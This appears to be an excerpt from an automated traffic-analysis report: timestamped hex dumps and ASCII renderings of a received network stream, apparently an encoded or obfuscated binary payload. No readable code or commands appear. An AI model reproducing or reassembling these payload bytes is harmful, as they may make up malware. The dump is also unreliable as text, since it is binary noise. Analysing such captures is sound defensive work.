                                                                              2022-06-01 23:53:22 UTC57INData Raw: 28 f8 28 f8 28 f8 2b f8 2b f8 2e f8 2c f8 2b f8 2e f8 2e f8 29 f8 2e f8 2e f8 2b f8 30 f8 2b f8 31 f8 2e f8 29 f8 2b f8 31 f8 2b f8 29 f8 2b f8 2e f8 2b f8 30 f8 2a f8 3c f8 2b f8 2a f8 2b f8 29 f8 2e f8 2a f8 2b f8 30 f8 2a f8 3c f8 2b f8 2e f8 2e f8 2b f8 2e f8 2e f8 2b f8 2c f8 2a f8 3c f8 2b f8 2b f8 2b f8 29 f8 2b f8 2b f8 2b f8 29 f8 2a f8 3c f8 2b f8 29 f8 2b f8 2d f8 2e f8 2b f8 2e f8 2c f8 2e f8 29 f8 2b f8 2c f8 2b f8 29 f8 2b f8 2e f8 2a f8 2c f8 28 f8 28 f8 28 f8 29 f8 2a f8 31 f8 28 f8 28 f8 28 f8 28 f8 2b f8 2a f8 2b f8 2a f8 2b f8 28 f8 2b f8 2a f8 2a f8 28 f8 2a f8 28 f8 39 f8 31 f8 3b f8 2a f8 2a f8 28 f8 2f f8 2c f8 2e f8 30 f8 2e f8 2f f8 2e f8 31 f8 2f f8 2a f8 2f f8 31 f8 2f f8 28 f8 2e f8 3e f8 2c f8 2b f8 29 f8 2a f8 28 f8 28 f8 28
                                                                              Data Ascii: (((++.,+..)..+0+1.)+1+)+.+0*<+*+).*+0*<+..+..+,*<+++)+++)*<+)+-.+.,.)+,+)+.*,((()*1((((+*+*+(+**(*(91;**(/,.0./.1/*/1/(.>,+)*(((
                                                                              2022-06-01 23:53:22 UTC61INData Raw: f8 2f f8 2e f8 28 f8 28 f8 29 f8 3a f8 28 f8 28 f8 2a f8 3d f8 28 f8 28 f8 2d f8 2f f8 28 f8 28 f8 29 f8 2b f8 28 f8 28 f8 2a f8 3d f8 28 f8 28 f8 2c f8 3d f8 28 f8 28 f8 28 f8 3a f8 28 f8 28 f8 2a f8 3d f8 28 f8 28 f8 28 f8 2e f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 30 f8 29 f8 28 f8 28 f8 2b f8 31 f8 28 f8 2a f8 39 f8 3c f8 28 f8 28 f8 30 f8 31 f8 28 f8 28 f8 28 f8 2e f8 28 f8 28 f8 2c f8 2c f8 28 f8 28 f8 3a f8 29 f8 28 f8 28 f8 2b f8 2b f8 28 f8 2a f8 2a f8 30 f8 28 f8 28 f8 39 f8 29 f8 28 f8 28 f8 2a f8 3a f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 31 f8 29 f8 28 f8 28 f8 2a f8 2d f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 30 f8 31 f8 28 f8 28 f8 28 f8 2e f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 30 f8 31 f8 28 f8 28 f8 29 f8 28 f8 28 f8 2a f8 2a f8 3e f8 28 f8
                                                                              Data Ascii: /.(():((*=((-/(()+((*=((,=(((:((*=(((.(**>((0)((+1(*9<((01(((.((,,((:)((++(**0((9)((*:(**>((1)((*-(**>((01(((.(**>((01(()((**>(
                                                                              2022-06-01 23:53:22 UTC65INData Raw: 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2c f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 30 f8 2c f8 2e f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2e f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 39 f8 28 f8 28 f8 28 f8 28 f8 2b f8 28 f8 28 f8 29 f8 28 f8 3a f8 2a f8 29 f8 28 f8 2a f8 28 f8 28 f8 3d f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 30 f8 39 f8 2b f8 3d f8 29 f8 3e f8 2b f8 3a f8 28 f8 28 f8 28 f8 2b f8 28 f8 29 f8 2c f8 3b f8 28 f8 28 f8 28 f8 28 f8 2c f8 2d f8 2d f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 2c f8 28 f8 39 f8 28 f8 3c
                                                                              Data Ascii: ((((((((,(((((((*(((((((*0,.(((((((((((((.(((((((9((((+(()(:*)(*((=(((((((((((((((((09+=)>+:(((+(),;((((,--(((((((((((((((*,(9(<
                                                                              2022-06-01 23:53:22 UTC69INData Raw: 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 2b f8 6f f8 43 f8 39 f8 39 f8 39 f8 39 f8 3c f8 39 f8 39 f8 39 f8 41 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39
                                                                              Data Ascii: 9999999999999999999999999999999999999+oC9999<999A9999999999999999999999999999999999999999999999999999999999999999999999999999999
                                                                              2022-06-01 23:53:22 UTC71INData Raw: 39 f8 41 f8 39 f8 66 f8 3d f8 39 f8 44 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 6d f8 3a f8 6f f8 5a f8 39 f8 63 f8 3f f8 39 f8 28 f8 3a f8 49 f8 51 f8 39 f8 6f f8 3f f8 39 f8 72 f8 3a f8 5f f8 5a f8 39 f8 3d f8 3f f8 39 f8 71 f8 3a f8 39 f8 4e f8 39 f8 39 f8 39 f8 39 f8 3d f8 39 f8 39 f8 42 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 6f f8 5a f8 39 f8 51 f8 3f f8 39 f8 6d f8 3a f8 49 f8 4b f8 39 f8 4d f8 3f f8 39 f8 6b f8 3a f8 49 f8 59 f8 39 f8 51 f8 3d f8 39 f8 71 f8 3a f8 49 f8 51 f8 39 f8 51 f8 3e f8 39 f8 3a f8 39 f8 39 f8 39 f8 39 f8 49 f8 3d f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 5f f8 39 f8 39 f8 39 f8 39 f8 39 f8 3d f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39
                                                                              Data Ascii: 9A9f=9D999999999m:oZ9c?9(:IQ9o?9r:_Z9=?9q:9N9999=99B999999oZ9Q?9m:IK9M?9k:IY9Q=9q:IQ9Q>9:9999I=9999999999999999999_99999=9999999
                                                                              2022-06-01 23:53:22 UTC75INData Raw: f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 3d f8 3b f8 39 f8 6b f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 3d f8 39 f8 39 f8 39 f8 39 f8 5f f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 3a f8 39 f8 39 f8 39 f8 39 f8 4b f8 39 f8 39 f8 59 f8 39 f8 49 f8 29 f8 39 f8 45 f8 40 f8 39 f8 6d f8 39 f8 39 f8 71 f8 39 f8 6b f8 3f f8 39 f8 6d f8 39 f8 5f f8 66 f8 39 f8 45 f8 3f f8 39 f8 6d f8 39 f8 39 f8 5f f8 39 f8 6b f8 3e f8 39 f8 6d f8 39 f8 39 f8 5f f8 39 f8 45 f8 3e f8 39 f8 6d f8 39 f8 5f f8 60 f8 39 f8 6b f8 3d f8 39 f8 6d f8 39 f8 49 f8 5a f8 39 f8 45 f8 3d f8 39 f8 6d f8 39 f8 39 f8 5f f8 39 f8 6b f8 3c f8 39 f8 6d f8 39 f8
                                                                              Data Ascii: 9999999999=;9k999999999999999=9999_999999999999999999:9999K99Y9I)9E@9m99q9k?9m9_f9E?9m99_9k>9m99_9E>9m9_`9k=9m9IZ9E=9m99_9k<9m9
                                                                              2022-06-01 23:53:22 UTC80INData Raw: 09 78 b0 fc fe 09 78 9c fc fe 09 78 8c fc fe 09 78 a8 fc fe 09 78 bc fc fe 09 78 c4 fb fe 09 21 fb fe 15 fb fc fe 09 78 f0 ff fe 0d 0a 25 fa 00 06 fa fe 00 ff f8 fa f9 0a 2d 09 31 fc fe 0a 79 04 fb 18 f8 00 fc fe 0a 79 08 fc 18 f9 fb 00 fc fe 0a 79 0c fc f8 f9 fb fb fc fe 0a 79 10 fd f8 f9 f9 0a 2d fc fe 0a 79 14 fc f8 f8 0a 45 fc fe 0a 79 18 fe 18 f9 0a 49 15 fd fc fe 0a 79 1c fd 18 f9 0a 4d 06 fc fe 0a 79 20 fd 18 f9 0a 51 06 fc fe 0a 79 24 fe 18 fa 14 14 15 14 fc fe 0a 79 28 fc f8 f9 f9 00 fc fe 0a 79 2c fc f8 f9 fa 06 fc fe 0a 79 30 fd f8 f9 15 fd 06 fc fe 0a 79 34 fc 18 f9 f9 06 fc fe 0a 79 38 fd 18 f9 f9 09 69 fc fe 0a 79 3c fd f8 f9 06 15 06 fc fe 0a 79 40 fe f8 f9 0a 39 0a 65 fc fe 0a 79 44 00 f8 fc f9 15 fd 00 10 00 fc fe 0a 79 48 fe f8 f9 0a 4d
                                                                              Data Ascii: xxxxxx!x%-1yyyy-yEyIyMy Qy$y(y,y0y4y8iy<y@9eyDyHM
                                                                              2022-06-01 23:53:22 UTC84INData Raw: 05 3a a0 7f bd 3e 89 2a 29 76 b4 91 8c 22 67 05 f3 54 87 a7 dd 2e 0b 02 ba a7 d2 c9 cf 89 c2 27 2f 65 47 98 f0 be 6a 8b b0 e6 f1 cb 4c 64 7b 55 49 89 18 1c 0c 78 3a 44 6d 51 44 2e bd 0b b8 14 5b d3 4c 3b d8 10 13 93 f0 7f ee 54 d0 fc a4 1f d8 44 e6 52 19 e7 1f 82 6b f0 d5 52 93 3c ae 7b 0e b0 1c ac 55 f3 17 19 6a 7e 31 d9 9d 30 c2 80 c1 5e 84 04 ce 82 94 4e b2 c3 ef db a3 79 19 1a 82 84 86 a4 30 ac 99 bb 5a e8 e1 bf 9f 1f 8f 71 e3 0e 8f 9c 68 35 3d 13 c4 aa cc 54 99 88 ba dc df cf b1 f5 8b 64 cd a2 ee 2b 93 5c 8e 95 5f 46 cb 78 a3 b6 02 0a 77 c6 10 8f 36 20 8b f7 b9 22 5a 89 9e 6c 9a 5c de 87 dc 3a ab 32 ad 43 03 7c bf ee f7 dc 70 a1 98 8e 44 1b 75 c2 60 ae e3 dd 8d b2 80 25 e9 3c 95 72 4f 6a 49 3c e2 a9 f7 c1 66 81 9f 04 ee 36 90 e8 12 da f8 7f 9d 62 79
                                                                              Data Ascii: :>*)v"gT.'/eGjLd{UIx:DmQD.[L;TDRkR<{Uj~10^Ny0Zqh5=Td+\_Fxw6 "Zl\:2C|pDu`%<rOjI<f6by
                                                                              2022-06-01 23:53:22 UTC88INData Raw: aa 01 fd 58 e5 1c f5 99 80 41 21 33 1f 7b b2 f0 6b 52 f9 e1 b0 7b be d1 d4 f0 11 52 82 4a 6c 0f a3 c7 70 3c b2 0c ea d4 f6 51 bd df b1 4e 64 a4 09 71 07 d8 4b ab 05 b2 05 dd b9 5d 4a 1d ac ed c5 bb 21 2c d5 30 8a 7a b8 09 73 f3 64 8b e3 21 c8 80 c7 a0 59 ab 44 46 a3 b6 01 40 e1 5c c8 21 5b 82 25 19 b2 9b c2 a9 56 9f b0 d1 3d 5a a4 96 2b aa 34 2e 60 3a ca 38 1d c8 95 85 95 c5 b6 41 37 5b 02 cf 1b 8b e8 51 b3 0d 43 4c 97 c1 96 c3 9b 2d 5f b3 7e 14 ce 50 12 68 37 00 35 70 2e ca be 19 78 e7 b8 8f 35 c9 12 c2 89 74 d6 0d 66 0b 38 7f 6c e4 b0 01 66 0f 31 67 58 e4 ee d1 a3 3c df 23 52 b0 6e 03 e9 30 fb f2 96 de e8 75 c6 77 a1 35 bf fc 21 bc 1c 5c 55 b4 47 7c 8f 0f ed 62 58 c5 73 38 7c 58 0d 5f 01 05 6c 72 3a 19 13 71 81 04 87 ea 68 93 3d 8d f4 e1 73 a5 d2 86 70
                                                                              Data Ascii: XA!3{kR{RJlp<QNdqK]J!,0zsd!YDF@\![%V=Z+4.`:8A7[QCL-_~Ph75p.x5tf8lf1gX<#Rn0uw5!\UG|bXs8|X_lr:qh=sp
                                                                              2022-06-01 23:53:22 UTC92INData Raw: bb 72 6a bb 35 bb 74 36 db 3c 94 25 58 7c 5b 98 61 32 35 70 dc f8 3d 16 e5 67 c8 28 ec b9 54 c6 42 84 a9 62 26 35 48 d5 3b 01 6f 91 15 7d 04 9a 84 12 cd bc c8 e7 15 c2 7b 1f 0d cb a0 1e 51 3b fb cf f1 6a 05 16 29 ad f7 9b 29 0d 85 ed 90 d5 5e dc 33 7d ca 52 3a 7e 81 5e ea 3f 1b 75 e5 49 92 4c 31 dd c8 14 e2 c0 c8 f4 e4 4e 88 bb b8 7a 6b e3 d2 bf d5 c6 30 0d 36 93 dc a0 8b c4 cf ed 77 c4 6d 0d ad 0b 17 58 49 37 39 bb a1 61 37 d0 d8 99 88 c0 97 1d ff 80 c8 8f 84 21 87 89 ec c8 b0 d2 d0 7c dc 1a e7 8e 1f 29 2a 9d 22 43 05 3b b4 31 71 f1 34 cd ec 8a 56 c8 0b 74 1f e0 16 d2 b2 de 9e 06 b9 ac 39 ba 30 f9 64 a8 af 6f d6 5a f6 24 44 ca b4 2b 8a 36 2d e9 92 5d e9 e7 66 67 4d e6 85 90 9d 36 d7 34 01 c8 7d 8e e4 81 36 30 82 7a 3a cb cb 92 56 2c af 57 f0 28 68 02 e6
                                                                              Data Ascii: rj5t6<%X|[a25p=g(TBb&5H;o}{Q;j))^3}R:~^?uIL1Nzk06wmXI79a7!|)*"C;1q4Vt90doZ$D+6-]fgM64}60z:V,W(h
                                                                              2022-06-01 23:53:22 UTC94INData Raw: cc d8 6a cd af b2 eb f1 9e 64 b8 f2 7f b8 cb 79 17 29 10 ba 5d 12 03 d2 97 fb 77 db 66 02 14 fb 40 c0 2a 81 b8 f3 16 76 05 99 a2 eb 42 29 bf af ff b4 4c 10 b6 26 77 47 49 78 07 85 a0 63 db 93 c5 5d 79 11 2c 99 2a 8d f7 ca 52 c0 bd 0c 02 1b 98 ee 74 f0 9c 8a 46 b4 67 26 d2 47 5c 94 c9 f5 b2 be 13 8c 9c bb 70 d1 00 08 8d d9 00 ad 40 ba 78 54 cc c8 07 1c 6c b1 96 95 db ad 99 78 3f 64 e8 c5 6f a6 bb e8 c0 72 c7 cc 57 20 c3 55 8b da 65 e7 41 00 dc 7d bd 39 08 33 18 40 bd 29 f9 bb f7 41 59 c5 3c 0f d6 73 e7 c6 d3 b9 a9 b2 5f c0 4b df 4e ca 85 e9 f5 bc 17 6f 45 42 e7 34 5e 40 fb c8 c3 f4 4e 13 e3 c9 c1 45 05 8d f7 0d a0 01 0b fa a0 f8 85 8f a6 16 b2 6d 6b 72 ae f5 91 10 79 e3 63 93 46 9e 97 8d 1b 53 79 16 be 39 71 76 7b d1 37 1a d6 fe 13 e8 bf 53 f6 c4 ef fe 24
                                                                              Data Ascii: jdy)]wf@*vB)L&wGIxc]y,*RtFg&G\p@xTlx?dorW UeA}93@)AY<s_KNoEB4^@NEmkrycFSy9qv{7S$
                                                                              2022-06-01 23:53:22 UTC98INData Raw: 27 ca 9b 8a 31 43 01 45 97 1e 43 72 c8 7a cf 2e 52 ec 24 9d c1 c7 88 92 b0 85 98 6c 44 db 9d 99 98 52 a0 36 16 35 94 f2 a2 f5 7b 55 f6 47 32 f8 b7 cf e0 ef 04 ef 74 bc 9c 20 6e b5 c4 ab f5 1b 9f 2b 4f e3 8f c9 55 d4 7f 8f 59 93 8b c2 a7 0f 81 1f 0f 66 9e 61 f2 e9 ec f9 3d 9c 81 f6 c5 1d fe ac 22 e4 3a c0 24 19 12 ef 53 c4 63 b2 39 91 f2 86 d6 7f b3 77 37 6c 15 8f 60 8a 28 1b b4 44 07 6f f9 46 14 2b d6 1a c5 6e fd 8f 0c 6d 3d 8d 89 a0 66 a7 1b ea 97 32 43 21 bf 9a 9a 2f 72 17 7d 1e 60 49 ab 92 11 f2 ec 12 ff 6c 34 d1 cd d2 90 a6 7e 65 72 21 e7 0d 9e b2 c3 dc 7f e2 2c 8a 47 79 e2 b4 00 c7 bd 8f b5 98 ed e6 fd 76 ba 3e 0b da c9 3a bc 9b 0b f9 da f7 a1 dd 75 6c 04 38 16 f6 ee a3 c0 8e 0e 0b 40 16 49 af 07 d4 1e 12 ae 36 3f 9c 28 ce d3 5c 35 30 7d c1 91 91 4d
                                                                              Data Ascii: '1CECrz.R$lDR65{UG2t n+OUYfa=":$Sc9w7l`(DoF+nm=f2C!/r}`Il4~er!,Gyv>:ul8@I6?(\50}M
                                                                              2022-06-01 23:53:22 UTC102INData Raw: 99 90 15 24 7e b2 74 45 ab 4e 7a eb 39 6f a8 a3 9c 7b c4 15 4b cb 23 29 f3 13 c3 0e 3f f5 e5 0d d1 2a 69 25 44 e8 92 27 aa 18 95 59 71 95 9b a2 21 2c 89 5c 2e 88 ff be b2 2c d9 a1 0a 56 ad 2f dc 30 fc 13 2a 78 27 da 26 bc 54 79 9e fb 36 0b 4d 6e 09 c4 86 6f 61 f2 bf 77 1e 3f 98 ff 4b 37 3b 5d 31 74 f6 7f 93 be 32 b9 ba 85 1c 39 ff a8 f1 e8 d5 be 0b c4 b0 f5 1a 81 22 ac f8 e3 4e f7 ce b6 0a 6b 13 dc 37 ad e5 77 95 79 64 e1 98 a1 f3 79 d9 d2 41 e9 c0 29 00 3b 0f 08 c8 8a b7 94 a3 bf f2 f6 f9 21 5a cd 51 90 84 6a 94 46 ae d3 9b 5c 78 16 50 23 6a f1 1c 6c c8 27 7c 5a 41 27 34 cf fa 92 a4 c2 8f 1a 02 6b b3 53 d4 64 f2 20 dc 28 c5 5d f2 1d f4 b4 31 5e 6a 55 56 1a bf 9d 77 c7 55 e1 1e 1a 09 02 8e d2 44 4b e3 da 20 7d e0 93 78 89 5b 95 27 fb f4 f1 a5 c1 ef 24 96
                                                                              Data Ascii: $~tENz9o{K#)?*i%D'Yq!,\.,V/0*x'&Ty6Mnoaw?K7;]1t29"Nk7wydyA);!ZQjF\xP#jl'|ZA'4kSd (]1^jUVwUDK }x['$
                                                                              2022-06-01 23:53:22 UTC106INData Raw: c1 02 ea 42 d8 2e c8 3e 74 ab f2 b1 c8 da 59 f7 95 2f b2 79 e8 06 ba 05 ff 0b 25 63 08 bc e9 ed 4a ed c1 79 82 74 cc ee 4c 92 0b ca 1d ae fd 0e 60 8f cb d2 28 f7 00 3b 7c 1c ca 29 29 a4 13 39 db a6 29 60 02 b1 43 d3 d3 c7 dc bf b3 53 f3 84 96 ad 07 9e 26 5d 3d 26 0f 5d 15 8e e6 fa e2 4d d1 1a 56 4a 78 32 1b 92 82 2a 5f 70 ab 04 4d 3c 35 59 d8 84 5f eb e1 f7 c5 48 10 dc 81 a9 ba b0 21 d2 cd b4 b9 38 f8 5f db 10 1e 18 33 cd 50 ef ad 43 92 e3 6b 98 30 6c 49 32 0b 96 a7 7f aa 3c 06 e7 a1 17 51 97 5c 84 73 f3 d2 c1 46 19 28 6e 79 f5 43 0e 35 21 f6 c7 94 07 24 3e fe e7 c9 b3 9c 62 34 a5 8c bf a3 1e e8 19 20 44 28 e0 11 46 7c 18 fb ec 45 ce 53 02 73 76 66 28 43 76 cb dd 20 00 b3 4b f2 9a 52 9b cb 92 5a f8 f1 44 6b 67 42 14 fb 52 e3 42 e1 39 ab a9 8b 62 04 6d 22
                                                                              Data Ascii: B.>tY/y%cJytL`(;|))9)`CS&]=&]MVJx2*_pM<5Y_H!8_3PCk0lI2<Q\sF(nyC5!$>b4 D(F|ESsvf(Cv KRZDkgBRB9bm"
                                                                              2022-06-01 23:53:22 UTC111INData Raw: 5f 7c 76 6d d5 e5 d7 15 71 f0 f5 1b f5 47 db fd 50 3c 6e f8 21 f4 b4 bb e4 54 5f d2 c0 f1 7e 46 4b 9d ec ee ec e0 9e c0 ed 91 24 51 48 3f 9a ff bb 95 c1 c8 3b 51 6d 2f 13 41 64 c8 5b 26 31 44 bb ac 7f 54 4c 5c e2 04 23 ad 86 89 28 4f 55 1e 53 f8 f4 57 f2 8d 56 28 f6 e0 f4 a2 0b f1 a3 52 62 f2 d7 d3 83 b5 6e 55 81 9a 5b d7 a3 e0 e6 8c 19 b4 ef d5 eb 76 3d 00 b3 44 38 02 e3 fc 34 87 0d 97 87 48 0a 79 ff 8e d7 89 1e 17 d6 09 1f 84 5b ee 3e 17 e8 aa 5e d8 c8 bd eb da 0a e5 2a 13 ce 88 a8 43 0f 08 1f 54 3d f8 81 a2 ba 95 01 d2 ea 59 95 d3 d4 a0 53 90 09 2c 77 4b 17 2e a1 9a 9e 0b 3a 5d c5 3f 6b 32 b6 c4 75 0b 7c 48 4e 76 ff 66 18 14 b4 c8 16 b5 2d 06 07 18 c6 38 89 ec c6 ff 48 76 9b 3e 37 71 cd 06 96 0d 9a 42 38 e3 df 97 5a 19 5b 89 85 c0 a2 41 25 45 33 14 eb
                                                                              Data Ascii: _|vmqGP<n!T_~FK$QH?;Qm/Ad[&1DTL\#(OUSWV(RbnU[v=D84Hy[>^*CT=YS,wK.:]?k2u|HNvf-8Hv>7qB8Z[A%E3
                                                                              2022-06-01 23:53:22 UTC115INData Raw: ec e4 c2 ef 2c 78 1f 54 68 be 32 c4 7b ec d7 56 6f da 88 13 8f 8d 3a 69 4a 69 03 a2 39 36 cc 8b 19 6d b6 cb 7d 73 53 3a 0f e2 31 ef 36 93 a6 dc 4c 62 54 de 77 ec a1 86 e6 48 cc 46 ff 08 a1 a5 32 c4 24 53 e8 12 bf 20 8b 67 7d 13 85 33 e6 51 fb 16 cb 0f 63 32 47 fe 5a 9d a2 d2 3b 13 fb 0b 99 71 62 61 71 f3 1f dc 37 ad d9 64 08 94 d4 a4 b4 f4 27 ca 8d ee 74 01 cb 98 46 4f f8 9d 8e d7 ca 22 52 86 70 7c 21 7d e6 98 0b fb b9 aa 2f 92 a5 99 e0 4f c2 09 b7 26 7a c9 ff 69 f4 77 5c 1d 8a 68 2f c6 fe 56 f1 b7 16 43 49 3f 48 f7 d4 03 7b 01 f0 a8 91 ea 90 01 11 72 dd e0 8b 9b 78 fa 7c 6d 0b 74 20 b0 24 57 2d e0 7c 68 67 44 87 86 b1 05 3c f6 3f 4e ee 03 04 41 b9 5f c1 44 4d f7 38 49 cf 17 c0 fb 5a 54 fb 86 a6 f9 f5 f7 5a a4 f7 1d 6e a0 eb 25 32 51 fd f9 79 74 2a d9 76
                                                                              Data Ascii: ,xTh2{Vo:iJi96m}sS:16LbTwHF2$S g}3Qc2GZ;qbaq7d'tFO"Rp|!}/O&ziw\h/VCI?H{rx|mt $W-|hgD<?NA_DM8IZTZn%2Qyt*v
                                                                              2022-06-01 23:53:22 UTC119INData Raw: 73 36 2b b7 8e c7 39 70 dc 4d f5 a5 2e e6 92 c6 9c da 7f 41 d8 85 1d c2 17 84 82 e3 8b 1e 9a 79 f2 dd 18 b0 16 f1 50 82 5a fa ca a6 0b da bf eb 7f 96 1c a9 31 5a 67 ab 5d f6 30 0c 98 fc d3 fd e3 bd 40 33 45 80 ce 28 f3 f2 d5 8a f8 94 10 53 c9 bb b9 1b 81 00 30 e5 48 b3 67 60 00 1c 15 ae 6b 4d e2 d3 69 0a 7a 79 3f 18 cc ef 47 87 92 ea c3 c6 a1 90 1d 21 a4 3c 51 47 70 f4 fa 73 81 b2 6d b6 f7 d2 e3 81 10 36 02 ad 86 07 6a 89 e4 fc 60 61 73 81 b9 f7 2e 90 3c 10 4a 5f 6b 51 a1 24 85 3f 81 e7 bb 8a fc 0f 1c 88 78 96 d6 ec 5d d2 e4 00 bd 80 a1 f3 0d 37 c6 0f 07 27 9f c0 2d cf c5 1a 7c 7a 9e 72 f8 fb be 53 b6 00 a2 44 27 6d 8b 42 b8 38 9c cb 33 c6 57 5b 90 51 d0 32 6f 94 2d f8 d0 cd 2d b6 4b 7b 5a af 41 5b aa 52 9a dd 87 cf a7 78 6f de b1 72 18 ef 2a 9f 23 19 ee
                                                                              Data Ascii: s6+9pM.AyPZ1Zg]0@3E(S0Hg`kMizy?G!<QGpsm6j`as.<J_kQ$?x]7'-|zrSD'mB83W[Q2o--K{ZA[Rxor*#
                                                                              2022-06-01 23:53:22 UTC123INData Raw: 8f e8 72 51 88 85 48 26 ad a2 d2 42 7b 7e 79 15 c8 eb 23 bf 37 d6 ba c0 8f b4 78 7e 1e 6c 76 ea 1c f9 ed d1 08 35 69 77 7c 31 c2 7f 33 54 15 55 cb 9a 1e b2 89 98 68 62 29 7f 1c a9 18 98 ba 59 01 79 b3 99 54 d0 cc 12 b2 d1 c1 ea b9 fe 4e 10 c4 e5 06 9f cf d9 bb bc 0c fd 91 11 79 76 52 63 0f b7 04 a2 80 14 8c a6 53 29 c6 85 8a 37 e9 36 46 7b 73 48 7a 74 0d 50 79 ae e5 35 ae 79 6a 20 cd e9 fa 7b 17 93 ee 00 46 8f c8 3b f1 dc 2f 14 d2 3c f8 95 d1 cf ef da 93 f4 55 e3 d1 30 68 5d 0b ca 39 07 74 2b ae b2 b1 7a 61 56 60 b6 7e b1 e9 03 36 8a 0d ea 54 b9 ef f4 7a b1 5d 09 ea 80 7d 30 9a 4c 78 74 7f 78 98 6a b8 8d c2 a6 ea ba 84 05 91 0b 76 c9 6d a5 cb 69 13 d6 de dc 1b b4 41 f3 2b 73 3c 3d c5 be 65 9a 13 b7 1f 71 5a 15 b3 75 11 39 b0 cf 74 b0 cf b0 50 d3 fa ea c0
                                                                              Data Ascii: rQH&B{~y#7x~lv5iw|13TUhb)YyTNyvRcS)76F{sHztPy5yj {F;/<U0h]9t+zaV`~6Tz]}0LxtxjvmiA+s<=eqZu9tP
                                                                              2022-06-01 23:53:22 UTC126INData Raw: c7 97 0c 31 14 21 55 03 21 15 3d 6f c6 3b 72 94 fb 9a 1b 64 8c 59 f9 c0 c3 08 ff 4e 1e 3d ff 29 cf 06 c5 5a 2b c6 d7 64 bd cb f8 2d d7 a1 71 24 f6 51 6c f0 e6 0a 3b 9a 68 b5 80 6b 3e 8a 91 87 fd 17 53 81 5c 27 da e0 99 19 c8 87 07 d8 ff 53 f1 18 82 d4 55 0b cd f3 00 f7 54 56 55 30 ae 79 3f 30 39 ad 5e e8 d5 a8 aa a6 d3 94 28 f5 38 89 5d 42 a5 9f b3 be 45 58 ae fe 1b 5e 9d 31 4b 56 e1 5b 50 ff 73 e3 04 d5 e1 fd c4 ae 06 5c 63 c1 ec d7 02 ac 5d d8 49 31 10 86 19 93 19 93 6b 54 fb fb aa 93 7d 40 ee c6 79 07 65 0a e0 ab a7 20 49 f5 0d 87 ca f6 49 55 f7 a9 51 c5 d1 6e 5a 82 be 73 42 e5 11 3d 32 4e 35 b9 bb 4c 76 39 92 bc f6 79 b7 f8 7e 02 58 2e e8 3f 7d 31 29 b8 c7 b2 34 02 21 f4 e5 fd 9c b5 0f b0 ad 9f af ab b2 60 4c 2c 16 13 21 ae fc bd 12 f9 eb 84 9c 6e 1d
                                                                              Data Ascii: 1!U!=o;rdYN=)Z+d-q$Ql;hk>S\'SUTVU0y?09^(8]BEX^1KV[Ps\c]I1kT}@ye IIUQnZsB=2N5Lv9y~X.?}1)4!`L,!n
                                                                              2022-06-01 23:53:22 UTC130INData Raw: ee 1e 1b 25 38 53 90 a4 71 f0 14 8d 2d 4f 84 40 90 56 45 fd 07 ba 3d 45 d8 0b 68 33 11 4c 7a d1 79 9e f9 1d 84 48 3f cc 28 b9 0b 2b 12 ff ac 8b 31 88 b9 4e 04 51 57 3d fb 22 54 1d ea 4d f4 90 96 fe 93 43 89 e4 03 91 94 1e c9 42 4f cc f3 60 b2 22 14 d0 0f 2c 4d b6 d5 26 47 13 b7 f5 81 e4 92 a0 dc ea d3 0e c0 22 7a 3d bd 41 08 73 f6 f0 08 f5 84 fe 07 f7 d9 e8 f7 e0 4f d6 c7 e2 93 55 6f 50 df 76 db 9b 7b 1a 76 e6 65 b9 24 d2 95 06 5f b4 61 a6 3c 7f 56 bb 26 4f ac e5 4a 47 53 b8 d3 e8 8c 50 f4 b4 d0 24 cb 27 e9 0d e6 88 ac 83 ae 74 2a 74 40 3d 97 25 83 69 65 ec 5b 24 f5 02 ce 73 76 38 af df 50 93 68 5c 3e b6 ea 54 2f 19 3c 82 71 c1 86 87 ce bc 03 aa c7 88 94 